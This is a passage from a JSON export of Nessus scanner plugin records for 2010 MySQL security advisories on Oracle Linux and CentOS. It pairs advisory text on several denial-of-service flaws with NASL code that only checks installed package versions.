get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "68184", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:oracle:linux:mysql-devel", "p-cpe:/a:oracle:linux:mysql-embedded", "p-cpe:/a:oracle:linux:mysql-libs", "p-cpe:/a:oracle:linux:mysql-bench", "p-cpe:/a:oracle:linux:mysql-test", "p-cpe:/a:oracle:linux:mysql-embedded-devel", "p-cpe:/a:oracle:linux:mysql-server"]}

{"nessus": [{"lastseen": "2019-01-16T20:16:39", "references": ["https://oss.oracle.com/pipermail/el-errata/2010-November/001724.html"], "pluginID": "68134", "description": "From Red Hat Security Advisory 2010:0825 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.", "edition": 6, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : mysql (ELSA-2010-0825)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:oracle:linux:mysql-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mysql-bench", "p-cpe:/a:oracle:linux:mysql-test", "p-cpe:/a:oracle:linux:mysql-server"], "id": "ORACLELINUX_ELSA-2010-0825.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0825 and \n# Oracle Linux Security Advisory ELSA-2010-0825 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68134);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42598, 42599, 42633, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2010:0825\");\n\n script_name(english:\"Oracle Linux 5 : mysql (ELSA-2010-0825)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0825 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-November/001724.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"mysql-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mysql-bench-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mysql-devel-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mysql-server-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mysql-test-5.0.77-4.el5_5.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-server / mysql-test\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:11:22", "references": ["http://www.nessus.org/u?dab7c63a", "http://www.nessus.org/u?dea757df"], "pluginID": "50806", "description": "Updated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.", "edition": 8, "reporter": "Tenable", "published": "2010-11-24T00:00:00", "title": "CentOS 5 : mysql (CESA-2010:0825)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:mysql-devel", "p-cpe:/a:centos:centos:mysql-server", "p-cpe:/a:centos:centos:mysql-bench", "p-cpe:/a:centos:centos:mysql-test", "p-cpe:/a:centos:centos:mysql", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2010-0825.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50806", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0825 and \n# CentOS Errata and Security Advisory 2010:0825 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50806);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42598, 42599, 42633, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2010:0825\");\n\n script_name(english:\"CentOS 5 : mysql (CESA-2010:0825)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-November/017144.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dab7c63a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-November/017145.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dea757df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"mysql-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mysql-bench-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mysql-devel-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mysql-server-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mysql-test-5.0.77-4.el5_5.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:11:18", "references": ["https://access.redhat.com/security/cve/cve-2010-3682", "https://access.redhat.com/security/cve/cve-2010-3833", "https://access.redhat.com/security/cve/cve-2010-3838", "https://access.redhat.com/security/cve/cve-2010-3677", "https://access.redhat.com/security/cve/cve-2010-3681", "https://access.redhat.com/security/cve/cve-2010-3840", "https://access.redhat.com/security/cve/cve-2010-3836", "https://access.redhat.com/security/cve/cve-2010-3839", "https://access.redhat.com/security/cve/cve-2010-3835", "https://access.redhat.com/security/cve/cve-2010-3837", "https://access.redhat.com/errata/RHSA-2010:0825", "https://access.redhat.com/security/cve/cve-2010-3680"], "pluginID": "50474", "description": "Updated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, 